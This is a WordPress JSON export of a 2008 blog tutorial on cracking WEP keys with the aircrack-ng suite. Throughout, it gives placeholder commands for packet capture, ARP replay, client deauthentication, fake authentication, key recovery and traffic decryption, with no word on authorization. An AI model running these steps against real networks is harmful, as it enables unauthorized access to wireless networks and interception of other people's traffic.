{"id":54,"date":"2008-11-07T03:52:00","date_gmt":"2008-11-07T08:52:00","guid":{"rendered":"http:\/\/www.rajatswarup.com\/blog\/?p=54"},"modified":"2010-02-10T23:38:52","modified_gmt":"2010-02-11T04:38:52","slug":"wep-cracking","status":"publish","type":"post","link":"https:\/\/www.rajatswarup.com\/blog\/2008\/11\/07\/wep-cracking\/","title":{"rendered":"WEP Cracking"},"content":{"rendered":"<p>If you want to crack WEP keys of an AP that is using WEP. <\/p>\n<p>The following steps should be performed:<\/p>\n<p>Start Capturing packets first:<br \/><span style=\"font-size:85%;\"><span style=\"font-family: courier new;\">sudo airodump-ng &#8211;bssid &lt;APMAC&gt; -w &lt;CAPTUREFILE&gt; &#8211;channel &lt;CHANNELNUM&gt; &lt;IFACE&gt;<\/span><\/span><\/p>\n<p>Start capturing ARP packets:<br \/><span style=\"font-size:85%;\"><span style=\"font-family: courier new;\">sudo aireplay-ng &#8211;arpreplay -e &lt;ESSID&gt; -b &lt;APMAC&gt; -h &lt;ASSOCIATEDCLIENTMAC&gt; &lt;IFACE&gt;<\/span><\/span><\/p>\n<p>Send deauth packets:<br \/><span style=\"font-family: courier new;font-size:85%;\" >sudo aireplay-ng &#8211;deauth 5 -a &lt;APMAC&gt; -c &lt;ASSOCIATEDCLIENTMAC&gt; -e &lt;ESSID&gt; &lt;IFACE&gt;<\/span><\/p>\n<p>Send fakeauth packets:<br \/><span style=\"font-family: courier new;font-size:85%;\" >sudo aireplay-ng &#8211;fakeauth 5 -e &lt;ESSID&gt; -b &lt;APMAC&gt; -h &lt;ASSOCCLIENTMAC&gt; &lt;IFACE&gt;<\/span><\/p>\n<p>Cracking WEP:<br \/><span style=\"font-family: courier new;font-size:85%;\" >aircrack-ng  -e &lt;ESSID&gt; -b &lt;APMAC&gt; -n &lt;BITSIZE&gt; -f &lt;FUDGEFACTOR&gt; &lt;CAPTUREFILE&gt;<\/span><\/p>\n<p>The fudge factor is a measure of how much randomness to check for.  I am not exactly sure of its cryptographic significance, however, it may make the difference between cracking a WEP key and not.<\/p>\n<p>Sometimes you may have an AP with no clients connected to it.  In such cases, follow the instructions at the following URL:<br \/><a href=\"http:\/\/www.aircrack-ng.org\/doku.php?id=how_to_crack_wep_with_no_clients\">How to crack WEP with no clients<\/a>.<\/p>\n<p>Once the WEP keys are obtained then use airdecap-ng to decrypt the packets:<br \/><span style=\"font-family: courier new;font-size:85%;\" >airdecap-ng -b &lt;APMAC&gt;  -e &lt;ESSID&gt;  -w &lt;KEY&gt;  &lt;PCAPFILE&gt;<br \/>tcpdump -r &lt;PCAPFILE&gt;-dec.cap<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>If you want to crack WEP keys of an AP that is using WEP. The following steps should be performed: Start Capturing packets first:sudo airodump-ng &#8211;bssid &lt;APMAC&gt; -w &lt;CAPTUREFILE&gt; &#8211;channel &lt;CHANNELNUM&gt; &lt;IFACE&gt; Start capturing ARP packets:sudo aireplay-ng &#8211;arpreplay -e &lt;ESSID&gt; -b &lt;APMAC&gt; -h &lt;ASSOCIATEDCLIENTMAC&gt; &lt;IFACE&gt; Send deauth packets:sudo aireplay-ng &#8211;deauth 5 -a &lt;APMAC&gt; -c &lt;ASSOCIATEDCLIENTMAC&gt; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[259],"tags":[265,464,266,264],"class_list":["post-54","post","type-post","status-publish","format-standard","hentry","category-wireless","tag-cracking","tag-crypto","tag-hacking","tag-wep"],"_links":{"self":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/54","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/comments?post=54"}],"version-history":[{"count":2,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/54\/revisions"}],"predecessor-version":[{"id":119,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/54\/revisions\/119"}],"wp:attachment":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/media?parent=54"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/categories?post=54"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/tags?post=54"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}